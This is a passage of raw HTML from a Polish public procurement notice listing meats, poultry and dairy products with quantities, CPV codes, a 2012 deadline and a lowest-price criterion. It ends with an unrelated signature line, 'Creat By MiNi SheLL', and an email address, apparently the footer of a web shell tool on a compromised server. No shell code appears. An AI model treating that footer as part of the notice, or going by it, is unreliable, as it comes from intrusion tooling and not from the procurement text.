31	Szynka wieprz. 	  60.00
32	Szynkowa	  35.00
33	Szynkówka	100.00  
34	Toruńska	  55.00
35	Kiełbasa na kanapki	  60.00
36	Śląska 	  90.00
37	Żywiecka 	130.00
38	Krakowska parz.	150.00
39	Jarmarczna	  75.00
40	Podwawelska	320.00
41	Tatrzańska	  30.00
42	Zwyczajna	  50.00
43	Jałowcowa	  18.00
44	Wędzonka farmerska	  62.00
45	Schabik dworski	   9.00
	MIĘSO WIEPRZOWE	
46	Boczek świeży b/k	210.00
47	Karkówka b/k	360.00
48	Łopatka b/k	760.00
49	Wątroba wieprz.	  40.00
50	Żeberka paski 	110.00
51	Schab b/k 	150.00
	Drób:	
52	Udo  z kurczaka	725.00
53	Porcje rosołowe	750.00
54	Pierś kurczaka z kością	  15.00
55	Filety z kurczaka	310.00
56	Wątróbka drobiowa	110.00
57	 Skrzydełka 	  10.00 
Przy dostawie wędlin plasterkowanych Zamawiający będzie żądał docinania odpowiedniej gramatury dla potrzeb przygotowania posiłków w ilości od 3 kg - do 3,20, jak również inne wędliny będą zamawiane na sztuki (parówka, śląska itp.), w zależności od potrzeb.
Przy dostawie mięsa drobiowego zamówienie będzie realizowane w sztukach (udka z kurcząt, filet z kurczaka)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> mleko i produkty mleczarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Budyń deser 150 g w kubeczkach	1100 szt
2.	Delma z masłem do kanapek op. 0,5 kg	1200 kg
3.	Kefir 400g	15 szt
4.	Jogurt owocowy  150 g	5700 szt
5.	Jogurt 4x125 g	200 szt
6.	Jogurt natural. 400 g	260 szt
7.	Jogurt naturalny 180 g	320szt
8.	Mleko karton 1l 1,5% - 2%	6660 L
9.	Margaryna typu Kasia	42 kg
10.	Serek homog. smakowy 180g	780 szt
11.	Ser topiony 100g kostka cena za 1 kg	250 kg
12.	Ser żółty półtłusty o zaw. tł. nie mniej niż 40% luz. 	300 kg
13.	Serek homog. naturalny 400 g.	100 szt
14.	Serek homog. Typu DANIO	100 szt
15.	Śmietana  400 ml  ukwaszona 	1200 szt
16.	Twaróg półtłusty	252 kg
17.	Twaróg chudy kostka 200 g	30 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com